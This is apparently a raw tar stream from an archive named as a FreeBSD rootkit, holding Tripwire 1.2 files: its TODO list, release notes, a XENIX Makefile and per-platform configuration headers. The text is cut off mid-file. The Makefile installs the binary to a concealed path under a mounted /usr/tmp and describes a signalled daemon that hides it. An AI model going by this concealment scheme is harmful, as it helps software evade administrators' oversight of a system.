fbsdrootkit-1.2/tripwire-1.2/TODO100600 764 764 5062 5612106406 13771 0ustar dfdf# $Id: TODO,v 1.17 1994/07/17 01:44:38 gkim Exp $ v1.2: Mon Mar 28 16:23:09 MST 1994 - add device (major, minor) numbers to database. - need Ported entries for Motorola stuff - need Ported entries for SCO stuff - need to mention Bishop's complaint - we need to figure out how to handle the new flex stuff. leaving ./contrib/config.pre.l.linux won't fly. BSD/386 also will suffer this problem. (And hurd, too, but they deserve it.) - eventually, the list routines should be changed to not tuck the varname and varvalue payloads as part of the structures. it was a good idea, and potentially saves mallocs. but, it is no longer possible to use our lists as string tables, because realloc() will sometimes free the strings! this is not a big nor pressing issue, but the changed list routines breaks some assertions that I made when I coded much of Tripwire. (Paul's list routines are still much better than mine!) v1.1: Mon Dec 13 09:38:23 EST 1993 - add !(num) pruning syntax (thanks Rik Farrow) v1.0.4: Fri Sep 3 11:56:32 EDT 1993 - add base10 signature printing - get tripwire to compile on SCO machines (ash@cellar.demon.co.uk,spaf) - tripwire daemon (safdas@moose.gs.com) - make -loosedir default behavior - monotonically increasing files (rouilj@ra.cs.umb.edu) - It should be possible to specify different ignore flags for directories and files in these directories, e.g.: =/var/tmp L-c /var/tmp E (jv@mh.nl) - add MD2 grant notice - add -partialcheck option (John Rouillard) (use entrynum) - add type classifiers (exclude/include certain types of files -- John Rouillard) - AT&T Starserver E compiler has problems - add -q option to make Tripwire noisy only when files change (Eric Bergren ) - make tests unrunnable from ./test directory (help Spaf?) - make MD5 faster (Eugene Zaustinsky) first net release v1.0: Tue Nov 3 04:37:39 EST 1992 fix byte "mangling" on MD2, MD4 and Snefru for Cray machines fix lurking bug that surfaces in ETA-10 versions find out why malloc() sometimes fails in Cray versions add -add and -delete command-line options database locking \ tripwire logging / Drew Gonczi has some fascinating ideas... regular expression handling in tw.config file hook for tar and cpio file parsing inclusion of complete and authorative documentation add "information mode" that explains inode fields change ./aux to some other name so MS-DOS users can unpack the sources! fbsdrootkit-1.2/tripwire-1.2/WHATSNEW100600 764 764 34004 5630546456 14517 0ustar dfdf## $Id: WHATSNEW,v 1.19 1994/08/30 06:09:50 gkim Exp $ ## ## WHATSNEW for Tripwire v1.2, v1.1.1, and v1.1 ## ## Gene Kim & Gene Spafford ## The COAST Project ## Department of Computer Sciences ## Purdue University ## ## ## Version 1.2 -- July 15, 1994 ## Version 1.2 adds several new features, as well as fixing reported bugs. Among the changes are: - Signature checking for symbolic link contents has been added. - Tripwire now correctly runs on Alpha AXPs, and other machines with "long" types that are not 32 bits wide. - The Haval digital hash routine has been added as the eighth signature routine (faster than MD5, and purportedly more secure). - The SHA signature routine has been changed to conform to the recent fix introducted in its FIPS definition by NIST/NSA to correct an unspecified weakness. - The database format changes slightly to correct a boundary condition error. Because database entry numbers change, because the SHA signatures change, and because of Haval, old Tripwire databases must be reinitialized. - Handling specified configuration and database files (and file descriptors) has been fixed to better accomodate pipes. - Full support for flex added. - Signature checking is now considerably faster through the use of the stdio library for file I/O. - A Perl script has been added to update Tripwire databases where all inode numbers were changed by "fsirand" (NFS sites only); See FAQ. - Another fix to make database updates more predictable. - All reported bugs have been fixed in this revision. - A new README section describes some documented attacks on systems running Tripwire. - Many small changes have been made to the documentation to correct and update information. NOTE: The script `twdb_check.pl' (written in Perl) has been added to the distribution. It checks database consistency after updates of the tw.config file. This functionality will be put into the Tripwire program in the next release. Run this script after Tripwire database updates to ensure that database entry numbers are consistent with the tw.config file. See the README file for details (section 3.5.2). Numerous other people played a crucial role in shaping this release: Paul Szabo is responsible for a number of fixes and cleaning up the way filenames are handled internally, leading to a much simpler treatment to filenames with escaped characters in Tripwire. Paul Hilchey is responsible for rewriting the list routines, fixing a number of bugs and replacing a hideous implementation with one that is elegant and succinct. Asokan is responsible for going through all the Tripwire code to remove assumptions about the size of certain types (e.g., "long" is not 32 bits on the Alpha). Casper H.S. Dik pointed out how some signature routines used very small reads, leading to suboptimal performance. He offered a simple fix through the use of the stdio library for file I/O. Cal Page modified the lex and yacc files to accomodate newer versions of GNU flex and bison, which continue to diverge from the traditional tools. Tom Orban spent many an afternoon on the phone with me, guiding me step-by-step to find elusive database update bugs. Among other things, Tom Orban and Terry Kennedy helped track down the problems that led to the addition of the twdb_check.pl script. Keith Rickert and Eugene Zaustinsky painstakingly pointed out distribution errors. Keith Rickert and Greg Black helped us with the last batch of fixes that shortly preceded this release. We appreciate their help. Thanks go to those people who helped test Tripwire: Eric Berg, Eric M. Boehm, Lothar Butsch, John Crosswhite, Jason Downs, Peter Evans, Jon Freivald, Kevin Johnson, Lothar Kaul, Terry Kennedy, Chris Kern, Paul Madden, Fred Marchand, Mitchell Marks, Jim Moreno, Tom Orban, Lorraine Padour, Calvin Page, Tom Painter, Roger Peyton, Peter Phillips, Keith W. Rickert, Jim Roche, D Seddon, Paul Szabo, Gene C Van Nostern, John Wiegley, Robert Wilhite, Alain Williams, Eugene Zaustinsky. Gene & Gene Kim & Spafford ## ## Version 1.1 -- December 15, 1994 ## Introduction: ============= Version 1.1 considerably upgrades the functionality of Tripwire. All known bugs have been fixed, and many selected features have been added at the request of Tripwire users. Among the major changes are: - rewrite of the "-update" command. - addition of an "-interactive" command that prompts the user whether a changed file's database entry should be updated. - addition of a "-loosedir" command for quieter Tripwire runs. - support for monotonically growing files in tw.config. - addition of comprehensive test suite to test Tripwire functionalities. - hooks for external services (i.e., compression, encryption, networking) through "-cfd" and "-dfd" options. - addition of the new NIST SHA/SHS signature algorithm. - corrections and changes in the MD2, MD4, MD5, CRC32, and Snefru signature routines. - addition of a more rigorous signature test suite. - more error checking in tw.config @@directives. - siggen replaces sigfetch. - addition of a tw.config file for Solaris v2.2 (SVR4). - change of base-64 alphabet to conform to standards. - preprocessor macro fixes. New Tripwire database format: ============================= The Tripwire database format has changed since v1.0, using a different base-64 alphabet and encoding scheme. Use the twconvert program to convert v1.0 databases to v1.1 databases (located in the ./src directory). If you have been using an older version of Tripwire, you will need to use twconvert convert your databases to the new format. Updating the Tripwire database: =============================== There has been a major rewrite/rethink of the "tripwire -update" command, as well as the addition of a "tripwire -interactive" command which allows the user to interactively select which database entries should be updated. No vestiges of the "-add" or "-delete" command remain, since the "-update" command now automatically deletes and adds files. However, the preferred way of keeping Tripwire databases in sync with the filesystems is using the "-interactive" command. A Tripwire session using Interactive mode might look like: 6:25am (flounder) tw/src 1006 %% tripwire -interactive ### Phase 1: Reading configuration file ### Phase 2: Generating file list ### Phase 3: Creating file information database ### Phase 4: Searching for inconsistencies ### ### Total files scanned: 49 ### Files added: 0 ### Files deleted: 0 ### Files changed: 49 ### ### After applying rules: ### Changes discarded: 47 ### Changes remaining: 2 ### changed: drwx------ genek 1024 May 3 06:25:37 1993 /homes/genek/research/tw/src changed: -rw------- genek 7978 May 3 06:24:19 1993 /homes/genek/research/tw/src/databases/tw.db_flounder.Eng.Sun.COM.old ### Phase 5: Generating observed/expected pairs for changed files ### ### Attr Observed (what it is) Expected (what it should be) ### =========== ============================= ============================= /homes/genek/research/tw/src st_mtime: Mon May 3 06:25:37 1993 Mon May 3 06:11:39 1993 st_ctime: Mon May 3 06:25:37 1993 Mon May 3 06:11:39 1993 ---> File: '/homes/genek/research/tw/src' ---> Update entry? [YN(y)nh?] y ### Updating database... ### ### Phase 1: Reading configuration file ### Phase 2: Generating file list ### Phase 3: Updating file information database ### ### Warning: Old database file will be moved to `tw.db_flounder.Eng.Sun.COM.old' ### in ./databases. ### 6:25am (flounder) tw/src 1007 %% Tripwire prompts the user whether the database entry of the current file should be updated to match the current file information. Pressing either 'y' or 'n' either updates the current file or skips to the next file. Pressing 'Y' or 'N' applies your answer to the entire entry. (I.e., if /etc is changed, typing 'Y' will not only update /etc, but it will also files update all the files in /etc.) Tripwire exit codes: ==================== Tripwire exit status can be interpreted by the following mask: 1: run-time error. aborted. 2: files added 4: files deleted 8: files changed For example, if Tripwire exits with status code 10, then files were found added and changed. (i.e., 8 + 2 = 10.) Tripwire quiet option: ====================== When run with -q option, Tripwire really is quiet, printing only one-line reports for each added, deleted, or changed file. The output is more suitable for parsing with awk or perl. Monotonically growing files: ============================ The ">" template is now supported in the tw.config files. This template allows files to grow without being reported. However, if the file is deleted or is smaller than the size recorded in the database, it is reported as changed. Loose directory checking: ========================= This option was prompted by complaints that Tripwire in Integrity Checking and Interactive mode unnecessarily complains about directories whose nlink, ctime, mtime, or size have changed. When Tripwire is run with the "-loosedir" option, directories automatically have these attributes included in their ignore-mask, thus quieting these complaints. Note that this is option is not enabled by default, making normal Tripwire behavior no different than previous releases. However, running with this option enabled considerably decreases "noise" in Tripwire reports. (Ideally, this "loose directory checking" should be offered on a per-file basis in the tw.config file. However, adding another field to the tw.config file was too extensive a change to be considered for this release. A later release of Tripwire may rectify this.) Hooks for external services: ============================ Tripwire now supports the "-cfd" and "-dfd" option that allows the user to specify an open file descriptor for reading the configuration file and database file, respectively. Using these options, an external program can feed Tripwire both input files through open file descriptors. This external program could supply services not provided though Tripwire, such as encryption, data compression, or a centralized network server. This program might do the following: Open the database and configuration files, process or decode (i.e., uncompress the file), and then write out the reguarly formatted file to a temporary file. Open file descriptors to these files are then passed to Tripwire by command-line arguments though execl(). An example of using a shell script to compress and encrypt your files is given in ./contrib/zcatcrypt. It is a four line Bourne shell script that encrypts and compresses the database and configuration files. SHA/SHS signature routines: =========================== Tripwire now includes SHA/SHS, the proposed NIST Digital Signature Standard. See the README file for details on this algorithm. Please note that the SHA code in ./sigs/sha seems to be poorly handled by many optimizing C compilers. For example, the stock C compiler included with SunOS 4.x takes almost two minutes to compile this file with the -O option on a Sparcstation10. Other compilers (such as GCC) do not have this problem. Change in tw.config preprocessor: ================================= The tw.config preprocessor has been changed to allow the proper expansion of @@variables in filenames. The following use of @@define now works as expected: @@define DOMAIN_NAME my_main_nis_domain /var/yp/@@DOMAIN_NAME L @@DOMAIN_NAME/FOO L (This is the third attempt at getting this working correctly. We finally fixed this by moving the macro expansion routines into the lexical analyzer.) Expanded test suite: ==================== The Tripwire test suite now includes runs a more standard signature test suite. This was prompted by discovery of several implementation errors in the MD2, MD4, and MD5 signature routines that was introduced right before the official release of Tripwire. (Thanks Eugene Zaustinsky.) Two more test suites have been added. One iterates through all the Tripwire reporting functionalities, and exercises all the database update cases. The other test suite checks for proper Tripwire preprocessor macro expansions. CRC32 changes: ============== Furthermore, the CRC32 signature routine is now POSIX 1003.2 compliant. (Thanks Dan Bernstein.) "siggen" replaces "sigfetch": ============================= As a tester noted, "sigfetch" was a misnomer since nothing was actually being fetched. Consequently, it was easy to (incorrectly) conclude that "sigfetch" retrieved signatures from the database. The "siggen" command is the current incarnation of "sigfetch". The manual pages reflect this change. Source code cleanup: ==================== The authors went through the sources, doing generic cleanups aid in code comprehension. Bug fixes: ========== This release fixes all known bugs. The TODO list, however, gives a wishlist of features that may be included in future releases. List of thanks: =============== Special thanks go to the testers of disappearing v1.0.3. Reports of critical bug fixes go to (in no special order): E. Clinton Arbaugh, Pat Macdonald, Eric Demerling, John Rouillard, Bob Cunningham, and Neil Todd. Sam Gassel, Edward DeHart, Drew Gonczi, Rik Farrow, Jim Napier, Drew Jolliffe, John Rouillard, Alain Brossard, Eric Bergren, Patrick Sullivan, Nora Hermida, Juergen Schmidt, Debbie Pomerance, Michael Hines, Tim Ramsey, Georges Tomazi, Mitchell Marks, Philip Cox, Kevin Dupre', Chris Kern, and Eugene Zaustinsky helped in getting the Tripwire v1.1 release in shape for our December 1993 release. Gene & Gene Kim & Spafford fbsdrootkit-1.2/tripwire-1.2/configs/ 40700 764 764 0 5630552013 14626 5ustar dfdffbsdrootkit-1.2/tripwire-1.2/configs/Makefile.xenix100600 764 764 12234 5434607427 17555 0ustar dfdf# $Id: Makefile.xenix,v 1.2 1993/08/19 05:26:47 genek Exp $ # # Tripwire build # # Gene Kim # Purdue University # # XENIX Makefile # support for parallel compiles (ala Dynix) # comment the following line out if your Make doesn't support this syntax. #P = & # you can use ANSI C if you like, but K&R is equally fine. CC = cc CFLAGS = -O #CC = gcc #CFLAGS = -O -ansi # make sure libraries are not linked dynamically (as a security measure) #LDFLAGS= -Bstatic LDFLAGS= -s -lx # NOTICE/TNL -lx required for dir type functions in LDFLAGS # If you don't have the install command, you need to replace # the use of it later in the makefile with a cp and chmod INSTALL= /etc/install # where you want to install the Tripwire binary TARGET = /usr/tmp/ch.Z.1123 # NOTICE/TNL above is a sneaky dir stored UNDER mounted /usr/tmp filesystem # to be exposed only during tripwire runs. A daemon (that does other things) # has a chdir("/usr/tmp"); that keeps the filesystem busy to confuse bad guys. # tripwire will kill -17 $TRIPWIREPID to tell the daemon to chdir away # from /usr/tmp so root can umount it for the tripwire run. Then another # SIGUSR2 to tell daemon to reoccupy /usr/tmp after the run. # how you get hostname information (BSD vs. SYSV style) HOSTNAME = uname -n #HOSTNAME = hostname OFILES = config.parse.o main.o list.o ignorevec.o databs.build.o \ utils.o preen.o diff.sorted.o diff.parse.o preen.interp.o \ preen.report.o nullsig.o \ $(SIG1) $(SIG2) SIG1DIR = ./md5 SIG2DIR = ./snefru SIG1 = $(SIG1DIR)/md5wrapper.o $(SIG1DIR)/md5.o SIG2 = $(SIG2DIR)/snefru.o # for generating shar distribution package DIST = tripwire-0.9 DISTPKG = Makefile README README.FIRST README.coast TODO Announce \ tripwire.config *.[ch] tripwire.8 tripwire.design.ms Changelog ### all: tripwire tripwire: $(P) $(OFILES) $(CC) $(CFLAGS) $(LDFLAGS) -o $@ $(OFILES) $(SIG1): (cd $(SIG1DIR); make CC="$(CC)" CFLAGS="$(CFLAGS)") $(SIG2): (cd $(SIG2DIR); make CC="$(CC)" CFLAGS="$(CFLAGS)") .c.o: $(CC) $(CFLAGS) -c $< install: tripwire $(INSTALL) tripwire $(TARGET) test: tripwire @HOST=`$(HOSTNAME)`; \ CURRPATH=`pwd`; \ sed s,/tmp/genek/tripwire-0.9,$$CURRPATH, \ < ./Tests/tripwire.database_TEST \ > ./Databases/tripwire.database_$$HOST; \ cp tripwire.config tripwire.config.orig; \ sed s,/tmp/genek/tripwire-0.9,$$CURRPATH, \ < ./tripwire.config.orig \ > ./tripwire.config; @echo ======= test begin ======= ; ./tripwire; @echo ======= test end ======= ; @echo ''; mv tripwire.config.orig tripwire.config; @CURRPATH=`pwd`; \ echo ''; \ echo Tripwire should have only reported: ; \ echo " added: $$CURRPATH/tripwire.config.orig" ; \ echo " $$CURRPATH/Databases/... " ; \ echo " changed: $$CURRPATH (your current directory) " ; \ echo " ...and any other files you may have changed!" # # only for building distribution # maketest: HOST=`$(HOSTNAME)`; \ CURRPATH=`pwd`; \ ./tripwire -initialize; \ cp ./Databases/tripwire.database_$$HOST ./Tests/tripwire.database_TEST;\ cp ./Tests/tripwire.database_TEST /tmp/genek/tripwire-0.9/Tests tags: force ctags *.[ch] shar: -mkdir $(DIST) -mkdir $(DIST)/Databases -cp $(DISTPKG) $(DIST) -cp -r $(SIG1DIR) $(SIG2DIR) ./$(DIST) -cp -r configs Tests $(DIST) -rm -fr ./$(DIST)/$(SIG1DIR)/RCS -rm -fr ./$(DIST)/$(SIG1DIR)/CVS.adm -rm -fr ./$(DIST)/$(SIG2DIR)/RCS -rm -fr ./$(DIST)/$(SIG2DIR)/CVS.adm -rm -fr ./$(DIST)/Tests/CVS.adm -rm -fr $(DIST)/./configs/CVS.adm -rm -f ./$(DIST)/$(SIG1DIR)/*.o -rm -f ./$(DIST)/$(SIG2DIR)/*.o shar -a $(DIST) > Tripwire.Dist.shar -rm -rf ./$(DIST) tar: -mkdir $(DIST) -mkdir $(DIST)/Databases -cp $(DISTPKG) $(DIST) -cp -r $(SIG1DIR) $(SIG2DIR) ./$(DIST) -cp -r configs Tests $(DIST) -rm -fr ./$(DIST)/$(SIG1DIR)/RCS -rm -fr ./$(DIST)/$(SIG1DIR)/CVS.adm -rm -fr ./$(DIST)/$(SIG2DIR)/RCS -rm -fr ./$(DIST)/$(SIG2DIR)/CVS.adm -rm -fr $(DIST)/./Tests/CVS.adm -rm -fr $(DIST)/./configs/CVS.adm -rm -f ./$(DIST)/$(SIG1DIR)/*.o -rm -f ./$(DIST)/$(SIG2DIR)/*.o tar cf Tripwire.Dist.tar $(DIST) -rm -rf ./$(DIST) depend: force makedep mv Makefile Makefile.old mv Makefile.new Makefile proto: force makeproto tripwire.h *.c clean: rm -f $(OFILES) clobber: clean force: # include dependencies #### Do not remove this line. Makedep depends on it! #### config.parse.o: ./config.h config.parse.o: ./list.h config.parse.o: ./tripwire.h databs.build.o: ./config.h databs.build.o: ./list.h databs.build.o: ./tripwire.h diff.parse.o: ./config.h diff.parse.o: ./list.h diff.parse.o: ./tripwire.h diff.sorted.o: ./config.h diff.sorted.o: ./list.h diff.sorted.o: ./tripwire.h diff.sorted.o: ./utils.c ignorevec.o: ./config.h ignorevec.o: ./list.h ignorevec.o: ./tripwire.h list.o: ./config.h list.o: ./list.h main.o: ./config.h main.o: ./list.h main.o: ./tripwire.h main.o: ./snefru/snefru.h main.o: ./md5/md5.h main.o: ./nullsig.h nullsig.o: ./config.h preen.o: ./config.h preen.o: ./list.h preen.o: ./tripwire.h preen.interp.o: ./config.h preen.interp.o: ./list.h preen.interp.o: ./utils.h preen.interp.o: ./tripwire.h preen.report.o: ./config.h preen.report.o: ./list.h preen.report.o: ./tripwire.h utils.o: ./config.h utils.o: ./list.h utils.o: ./tripwire.h fbsdrootkit-1.2/tripwire-1.2/configs/conf-3b2g.h100600 764 764 2134 5434607430 16564 0ustar dfdf/* $Id: conf-3b2g.h,v 1.2 1993/08/19 05:26:48 genek Exp $ */ /* * conf-3b2g.h * * Tripwire configuration file * * Gene Kim * Purdue University * * Port by Joe Sirrianni * */ /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * is your OS a System V derivitive? if so, what version? * (e.g., define SYSV 4) */ #define SYSV 3 /* * does your system have a like System V? */ #define MALLOCH /* * does your system have a like POSIX says you should? */ #undef STDLIBH /* * does your system use readdir(3) that returns (struct dirent *)? */ #define DIRENT /* * is #include ok? (as opposed to ) */ #define STRINGH /* * does your system have gethostname(2) (instead of uname(2))? */ #undef GETHOSTNAME /* * missing defines */ #define MAXPATHLEN 256 /* * To work around lack of gettimeofday() in src/dbase.build.c */ #define NOGETTIMEOFDAY fbsdrootkit-1.2/tripwire-1.2/configs/conf-3b2gr.h100600 764 764 1720 5434607431 16747 0ustar dfdf/* $Id: conf-3b2gr.h,v 1.2 1993/08/19 05:26:49 genek Exp $ */ /* * conf-3b2gr.h * * Tripwire configuration file * * Gene Kim * Purdue University * * Port by Joe Sirrianni * */ /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * is your OS a System V derivitive? if so, what version? * (e.g., define SYSV 4) */ #define SYSV 4 /* * does your system have a like System V? */ #define MALLOCH /* * does your system have a like POSIX says you should? */ #define STDLIBH /* * does your system use readdir(3) that returns (struct dirent *)? */ #define DIRENT /* * is #include ok? (as opposed to ) */ #define STRINGH /* * does your system have gethostname(2) (instead of uname(2))? */ #undef GETHOSTNAME fbsdrootkit-1.2/tripwire-1.2/configs/conf-aix.h100600 764 764 1727 5434607432 16621 0ustar dfdf/* $Id: conf-aix.h,v 1.2 1993/08/19 05:26:50 genek Exp $ */ /* * conf-aix.h * * Tripwire configuration file * * Gene Kim * Purdue University */ /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * is your OS a System V derivitive? if so, what version? * (e.g., define SYSV 4) */ #undef SYSV /* * does your system have a like System V? */ #undef MALLOCH /* * does your system have a like POSIX says you should? */ #undef STDLIBH /* * does your system have gethostname(2) (instead of uname(2))? */ #define GETHOSTNAME /* * does your system use readdir(3) that returns (struct dirent *)? */ #define DIRENT /* * is #include ok? (as opposed to ) */ #define STRINGH /* * miscellaneous stuff * * AIX redefines much of typedefs as unsigned longs. */ #define AIX fbsdrootkit-1.2/tripwire-1.2/configs/conf-apollo.h100600 764 764 2131 5532334025 17306 0ustar dfdf/* $Id: conf-apollo.h,v 1.1 1994/02/22 07:45:25 gkim Exp $ */ /* * conf-apollo.h (Apollo Domain/OS SR10.X, m68k or a88k, BSD environment) * * Tripwire configuration file * * Paul Szabo * University of Sydney */ /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * is your OS a System V derivative? if so, what version? * (e.g., define SYSV 4) */ #undef SYSV /* * does your system have a like System V? */ #undef MALLOCH /* * does your system have a like POSIX says you should? */ /* Apollos DO NOT have this pre-SR10.4 (or maybe pre-SR10.3 ??), so you must have NO (#undef) pre-SR10.4 (or pre-SR10.3); you should have YES (#define) at SR10.4 (or SR10.3). */ #undef STDLIBH /* * does your system use readdir(3) that returns (struct dirent *)? */ #undef DIRENT /* * is #include ok? (as opposed to ) */ #define STRINGH /* * does your system have gethostname(2) (instead of uname(2))? */ #define GETHOSTNAME fbsdrootkit-1.2/tripwire-1.2/configs/conf-aux3.h100600 764 764 1764 5434607433 16722 0ustar dfdf/* $Id: conf-aux3.h,v 1.2 1993/08/19 05:26:51 genek Exp $ */ /* * conf-aux3.h * * Tripwire configuration file * * Gene Kim * Purdue University * * A/UX port provided by: * Phillip Porch (root@raidernet.com) */ /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * is your OS a System V derivitive? if so, what version? * (e.g., define SYSV 4) */ #define SYSV 2 /* * does your system have a like System V? */ #define MALLOCH /* * does your system have a like POSIX says you should? */ /* #define STDLIBH */ /* * does your system use readdir(3) that returns (struct dirent *)? */ #define DIRENT /* * is #include ok? (as opposed to ) */ #define STRINGH /* * does your system have gethostname(2) (instead of uname(2))? */ #undef GETHOSTNAME /* * missing defines */ /* #define MAXPATHLEN PATH_MAX */ fbsdrootkit-1.2/tripwire-1.2/configs/conf-bsd.h100600 764 764 1543 5434607434 16606 0ustar dfdf/* $Id: conf-bsd.h,v 1.2 1993/08/19 05:26:52 genek Exp $ */ /* * conf-bsd.h * * Tripwire configuration file * * Gene Kim * Purdue University */ /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * is your OS a System V derivitive? if so, what version? * (e.g., define SYSV 4) */ #undef SYSV /* * does your system have a like System V? */ #undef MALLOCH /* * does your system have a like POSIX says you should? */ #undef STDLIBH /* * does your system use readdir(3) that returns (struct dirent *)? */ #undef DIRENT /* * is #include ok? (as opposed to ) */ #define STRINGH /* * does your system have gethostname(2) (instead of uname(2))? */ #define GETHOSTNAME fbsdrootkit-1.2/tripwire-1.2/configs/conf-bsdi.h100600 764 764 1637 5620062014 16745 0ustar dfdf/* $Id: conf-bsdi.h,v 1.2 1994/08/04 03:44:12 gkim Exp $ */ /* * conf-bsdi.h * * Tripwire configuration file * * Terry Kennedy * St. Peter's College * Derived from: * Gene Kim * Purdue University */ /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * is your OS a System V derivitive? if so, what version? * (e.g., define SYSV 4) */ #undef SYSV /* * does your system have a like System V? */ #undef MALLOCH /* * does your system have a like POSIX says you should? */ #define STDLIBH /* * does your system use readdir(3) that returns (struct dirent *)? */ #define DIRENT /* * is #include ok? (as opposed to ) */ #define STRINGH /* * does your system have gethostname(2) (instead of uname(2))? */ #define GETHOSTNAME fbsdrootkit-1.2/tripwire-1.2/configs/conf-convex.h100600 764 764 1677 5434607435 17351 0ustar dfdf/* $Id: conf-convex.h,v 1.2 1993/08/19 05:26:53 genek Exp $ */ /* * conf-convex.h * * Tripwire configuration file * * Gene Kim * Purdue University * * Ported to COnvexos 9.1 * by Adrian P van Bloois at ACCU */ /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * is your OS a System V derivitive? if so, what version? * (e.g., define SYSV 4) */ #undef SYSV /* * does your system have a like System V? */ #undef MALLOCH /* * does your system have a like POSIX says you should? */ #define STDLIBH /* * does your system use readdir(3) that returns (struct dirent *)? */ #define DIRENT /* * is #include ok? (as opposed to ) */ #define STRINGH /* * does your system have gethostname(2) (instead of uname(2))? */ #define GETHOSTNAME fbsdrootkit-1.2/tripwire-1.2/configs/conf-dynix.h100600 764 764 1547 5434607436 17177 0ustar dfdf/* $Id: conf-dynix.h,v 1.2 1993/08/19 05:26:54 genek Exp $ */ /* * conf-dynix.h * * Tripwire configuration file * * Gene Kim * Purdue University */ /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * is your OS a System V derivitive? if so, what version? * (e.g., define SYSV 4) */ #undef SYSV /* * does your system have a like System V? */ #undef MALLOCH /* * does your system have a like POSIX says you should? */ #undef STDLIBH /* * does your system use readdir(3) that returns (struct dirent *)? */ #undef DIRENT /* * is #include ok? (as opposed to ) */ #define STRINGH /* * does your system have gethostname(2) (instead of uname(2))? */ #define GETHOSTNAME fbsdrootkit-1.2/tripwire-1.2/configs/conf-epix.h100600 764 764 1512 5434607437 17002 0ustar dfdf/* $Id: conf-epix.h,v 1.2 1993/08/19 05:26:55 genek Exp $ */ /* * conf-umips.h * * Tripwire configuration file * */ /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * is your OS a System V derivitive? if so, what version? * (e.g., define SYSV 4) */ #define SYSV 4 /* * does your system have a like System V? */ #define MALLOCH /* * does your system have a like POSIX says you should? */ #undef STDLIBH /* * does your system use readdir(3) that returns (struct dirent *)? */ #define DIRENT /* * is #include ok? (as opposed to ) */ #define STRINGH /* * does your system have gethostname(2) (instead of uname(2))? */ #define GETHOSTNAME fbsdrootkit-1.2/tripwire-1.2/configs/conf-hpux.h100600 764 764 2347 5612067671 17026 0ustar dfdf/* $Id: conf-hpux.h,v 1.5 1994/07/16 23:39:37 gkim Exp $ */ /* * conf-hpux.h * * Tripwire configuration file * * Gene Kim * Purdue University * * HP/UX port by: * Lance Bailey */ /* "Cory F. Cohen" writes: * My GCC already had _HPUX_SOURCE defined... so I used * #ifndef __GNUC__ (I added) * #define _HPUX_SOURCE (My GCC already had this defined) * #endif (I added) */ #define _HPUX_SOURCE /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * is your OS a System V derivitive? if so, what version? * (e.g., define SYSV 4) */ #undef SYSV /* * does your system have a like System V? */ #define MALLOCH /* * does your system have a like POSIX says you should? */ #define STDLIBH /* * does your system use readdir(3) that returns (struct dirent *)? */ #define DIRENT /* * is #include ok? (as opposed to ) */ #define STRINGH /* * does your system have gethostname(2) (instead of uname(2))? */ #define GETHOSTNAME fbsdrootkit-1.2/tripwire-1.2/configs/conf-irix4.h100600 764 764 1665 5434607441 17100 0ustar dfdf/* $Id: conf-irix4.h,v 1.2 1993/08/19 05:26:57 genek Exp $ */ /* * conf-irix4.h * * Tripwire configuration file * * Gene Kim * Purdue University * * IRIX4 port by: * Simon Leinen * Ecole Polytechnique Federale de Lausanne */ /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * is your OS a System V derivitive? if so, what version? * (e.g., define SYSV 4) */ #define SYSV 3 /* * does your system have a like System V? */ #define MALLOCH /* * does your system have a like POSIX says you should? */ #define STDLIBH /* * does your system use readdir(3) that returns (struct dirent *)? */ #define DIRENT /* * does your system have lstat() */ #define HAVE_LSTAT /* * is #include ok? (as opposed to ) */ #define STRINGH fbsdrootkit-1.2/tripwire-1.2/configs/conf-linux.h100600 764 764 1570 5613607566 17202 0ustar dfdf/* $Id: conf-linux.h,v 1.1 1994/07/22 00:14:46 gkim Exp $ */ /* * conf-dynix.h * * Tripwire configuration file * * Gene Kim * Purdue University */ /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * is your OS a System V derivitive? if so, what version? * (e.g., define SYSV 4) */ #undef SYSV /* * does your system have a like System V? */ #undef MALLOCH /* * does your system have a like POSIX says you should? */ #undef STDLIBH /* * does your system use readdir(3) that returns (struct dirent *)? */ #undef DIRENT /* * is #include ok? (as opposed to ) */ #define STRINGH /* * does your system have gethostname(2) (instead of uname(2))? */ #define GETHOSTNAME #define TW_LINUX fbsdrootkit-1.2/tripwire-1.2/configs/conf-mach.h100600 764 764 2135 5434607442 16743 0ustar dfdf/* $Id: conf-mach.h,v 1.2 1993/08/19 05:26:58 genek Exp $ */ /* * conf-mach.h * * Tripwire configuration file * * Peter Shipley * TFS (TRW Financial Systems) */ /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * is your OS a System V derivitive? if so, what version? * (e.g., define SYSV 4) */ #undef SYSV /* * does your system have a like System V? */ #undef MALLOCH /* * does your system have a like POSIX says you should? */ #undef STDLIBH /* * does your system use readdir(3) that returns (struct dirent *)? */ /* MACH has readdir(3) but no include file */ #undef DIRENT /* * is #include ok? (as opposed to ) */ #define STRINGH /* * does your system have gethostname(2) (instead of uname(2))? */ #define GETHOSTNAME /* * miscellaneous stuff */ #define MACH 1 /* MACH seems to be missing the define for S_IFIFO [but is had S_ISFIFO() ] */ #ifndef S_IFIFO #define S_IFIFO 0010000 #endif fbsdrootkit-1.2/tripwire-1.2/configs/conf-motoR3.h100600 764 764 2232 5611466322 17211 0ustar dfdf/* * conf-svr3.h * * Tripwire configuration file * * Kevin Johnson * Motorola Computer Group * * Notes: I used GCC 2.4.5 to compile (didn't 